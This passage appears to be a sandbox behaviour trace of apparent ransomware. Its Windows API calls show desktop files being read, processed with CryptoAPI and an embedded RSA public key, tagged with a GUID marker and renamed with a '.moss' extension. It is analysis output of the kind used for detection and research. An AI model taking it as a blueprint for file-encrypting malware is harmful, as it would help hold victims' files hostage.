CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0169.294] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0169.294] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0169.294] GetLastError () returned 0x0 [0169.294] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0169.294] CryptReleaseContext (hProv=0xd2f0b8, dwFlags=0x0) returned 1 [0169.294] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0169.294] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0169.294] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0169.294] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.294] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0169.294] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.294] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.294] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18b20) returned 0x3b62d40 [0169.298] SetFilePointer (in: hFile=0x664, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0169.298] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0169.298] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b39e58 [0169.298] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.298] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b447b0 [0169.298] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x36136d0 [0169.298] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b45398 [0169.298] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbd98 [0169.298] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b453e0 [0169.298] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbdb0 [0169.298] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbde0 [0169.298] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc90 [0169.298] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbdf8 [0169.298] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x24) returned 0x35f9e20 [0169.298] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x158) returned 0x3b51ec0 [0169.298] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0169.298] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b7b868 [0169.298] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbde0 | out: hHeap=0xcd0000) returned 1 [0169.299] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbdf8 | out: hHeap=0xcd0000) returned 1 [0169.299] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0169.299] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0169.299] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b7b868 | out: hHeap=0xcd0000) returned 1 [0169.299] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc90 [0169.299] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd290 [0169.299] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbdf8 [0169.299] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a50 [0169.299] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x35fbde0 [0169.299] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd320 [0169.299] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0xd57fe0 [0169.299] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0169.299] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613610 [0169.299] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0169.299] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa2470 [0169.299] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a70 [0169.299] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0169.299] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0169.299] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbdf8 | out: hHeap=0xcd0000) returned 1 [0169.299] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0169.299] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbde0 | out: hHeap=0xcd0000) returned 1 [0169.299] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a50 | out: hHeap=0xcd0000) returned 1 [0169.299] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0169.299] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0169.299] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0169.300] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x36136d0 | out: hHeap=0xcd0000) returned 1 [0169.300] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5ed58 | out: hHeap=0xcd0000) returned 1 [0169.300] GetCurrentThreadId () returned 0x324 [0169.300] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd57fe0 [0169.300] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x82) returned 0xd31ee0 [0169.300] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2c) returned 0x3608a70 [0169.300] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f0b8 [0169.300] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x148) returned 0x35deb08 [0169.300] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0169.300] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0169.300] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35ceae8 [0169.300] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.300] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.300] GetCurrentThreadId () returned 0x324 [0169.300] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.300] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.300] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xeb) returned 0xd23a00 [0169.300] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.300] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.300] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.300] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.300] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0169.300] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd23a00 [0169.300] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0169.301] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4c) returned 0x362cc38 [0169.301] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0169.301] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35f7c30 [0169.301] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0169.301] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc90 [0169.301] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0169.301] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0169.301] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2e0 [0169.301] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2f0 [0169.301] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd300 [0169.301] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0169.301] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0169.301] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0169.301] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbde0 [0169.301] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0169.301] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2e0 [0169.301] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0169.301] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0169.301] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd340 [0169.301] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd350 [0169.301] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd360 [0169.301] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbdf8 [0169.301] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd350 | out: hHeap=0xcd0000) returned 1 [0169.302] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a50 [0169.302] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd340 | out: hHeap=0xcd0000) returned 1 [0169.302] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbdc8 [0169.302] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd360 | out: hHeap=0xcd0000) returned 1 [0169.302] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbbe8 [0169.302] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0169.302] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd330 [0169.302] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0169.302] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbb70 [0169.302] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0169.302] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc00 [0169.302] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0169.302] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbe10 [0169.302] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbb70 | out: hHeap=0xcd0000) returned 1 [0169.302] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbb70 [0169.302] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc00 | out: hHeap=0xcd0000) returned 1 [0169.302] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2f0 [0169.302] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0169.302] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a10 [0169.302] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0169.302] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1c) returned 0x3b3c6d8 [0169.302] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbde0 | out: hHeap=0xcd0000) returned 1 [0169.302] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbde0 [0169.302] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0169.303] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x204) returned 0x3b449a8 [0169.303] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0169.303] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa2588 [0169.303] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbb70 | out: hHeap=0xcd0000) returned 1 [0169.303] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x210) returned 0x3b44bb8 [0169.303] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0169.303] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10c) returned 0xdc53e8 [0169.303] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0169.303] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa26a0 [0169.303] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbde0 | out: hHeap=0xcd0000) returned 1 [0169.303] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x200) returned 0x3b7b868 [0169.303] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2588 | out: hHeap=0xcd0000) returned 1 [0169.304] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x18b18, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.304] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0169.305] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0169.305] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0169.305] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0169.305] CloseHandle (hObject=0x664) returned 1 [0169.307] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KDhrAhNu6jQBzP8T.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kdhrahnu6jqbzp8t.xls"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KDhrAhNu6jQBzP8T.xls.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kdhrahnu6jqbzp8t.xls.moss")) returned 1 [0169.308] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0169.308] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.308] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0169.309] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68b46860, ftCreationTime.dwHighDateTime=0x1d5e7dd, ftLastAccessTime.dwLowDateTime=0x1c145b60, ftLastAccessTime.dwHighDateTime=0x1d5d968, ftLastWriteTime.dwLowDateTime=0x1c145b60, ftLastWriteTime.dwHighDateTime=0x1d5d968, nFileSizeHigh=0x0, nFileSizeLow=0x326b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kLIoOLxdv.pptx", cAlternateFileName="KLIOOL~1.PPT")) returned 1 [0169.309] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\kLIoOLxdv.pptx") returned=".pptx" [0169.309] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\kLIoOLxdv.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\klioolxdv.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0169.310] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=12907) returned 1 [0169.310] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0169.326] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x3245, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.326] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0169.328] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.328] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x326b, lpOverlapped=0x0) returned 1 [0169.329] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.329] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.329] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.329] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f030) returned 1 [0169.333] CryptCreateHash (in: hProv=0xd2f030, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0169.334] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0169.334] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0169.334] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0169.334] GetLastError () returned 0x0 [0169.334] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0169.334] CryptReleaseContext (hProv=0xd2f030, dwFlags=0x0) returned 1 [0169.334] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0169.334] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0169.334] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.334] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0169.335] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0169.335] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b4ba98 [0169.336] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x326b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.336] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0169.336] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0169.336] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0169.336] CloseHandle (hObject=0x664) returned 1 [0169.338] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2b10 [0169.338] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x880) returned 0x3b48820 [0169.338] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2b10 | out: hHeap=0xcd0000) returned 1 [0169.339] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\kLIoOLxdv.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\klioolxdv.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\kLIoOLxdv.pptx.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\klioolxdv.pptx.moss")) returned 1 [0169.340] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0169.340] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.341] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0169.343] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd34af8 | out: hHeap=0xcd0000) returned 1 [0169.343] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb87943b0, ftCreationTime.dwHighDateTime=0x1d5dea6, ftLastAccessTime.dwLowDateTime=0xb78df2b0, ftLastAccessTime.dwHighDateTime=0x1d5e1ae, ftLastWriteTime.dwLowDateTime=0xb78df2b0, ftLastWriteTime.dwHighDateTime=0x1d5e1ae, nFileSizeHigh=0x0, nFileSizeLow=0xab0f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ndaW7cmNb.gif", cAlternateFileName="NDAW7C~1.GIF")) returned 1 [0169.343] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362cc38 [0169.343] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x76) returned 0xd34af8 [0169.343] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cc38 | out: hHeap=0xcd0000) returned 1 [0169.343] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ndaW7cmNb.gif") returned=".gif" [0169.343] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ndaW7cmNb.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ndaw7cmnb.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 